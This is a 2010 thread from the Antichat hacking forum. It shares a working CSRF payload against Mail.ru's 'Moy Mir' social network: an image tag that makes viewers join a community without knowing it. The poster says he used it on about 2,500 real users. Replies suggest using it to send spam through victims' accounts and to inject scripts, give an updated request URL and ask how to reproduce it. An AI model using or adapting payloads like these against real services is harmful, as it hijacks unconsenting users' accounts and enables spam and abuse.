Форум АНТИЧАТ - CSRF на МОЙ МИР

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - CSRF на МОЙ МИР (https://forum.antichat.xyz/showthread.php?t=196396)

life_glider

15.04.2010 14:06

CSRF на МОЙ МИР(УЖЕ ЗАКРЫЛИ =()

Можно подделать GET запрос вступления в сообщество
отправив в сообщении картинку:

Код:

<img src='http://my.mail.ru/community/wtfo_o/community-participate?participate=1&back=.gif' alt=""/>

без спама создал сообщество и в него вступили около 2500 человек.
Пример:
http://my.mail.ru/community/ilovemailru/
Паника:
http://my.mail.ru/community/shosse/5DB670B26D452A64.html
Просто из сообщества выйти бало весьма затруднительно
возможно есть другие идеи?

Komyak

15.04.2010 15:08

Респект!! =)) Особенно отзывы в гостевой и по второй ссыле понравились. =))

satana-fu

15.04.2010 15:35

если тег <img src=""> проходит нормально в Моем Мире, этого можно извлечь кучу выгод, вступление в группу это лишь кусочек.
Попробуй активировать им скрипт рассылки писем и получишь бесплатный спамер с разных айпи...

Делал как то такое на ukr.net и mail.ru, когда тестил. Возможны и другие применения...

life_glider

15.04.2010 16:16

logout, попытаться впендюрить скрипт или форму через ифрэйм?

Jerri

15.04.2010 23:41

Цитата:

http://my.mail.ru/community/wtfo_o/

Прикольно, респект.)

life_glider

16.04.2010 07:03

http://my.mail.ru/community/mama-love/community-participate?mna=627251&mnb=4183580616&participate= 1

теперь в сообщества надо добавляться так. Но по стараму тоже канает.

попугай

16.04.2010 16:05

в понедельник прикроем

S1ash

16.04.2010 18:51

еще работает?
как сделать?

Время: 15:32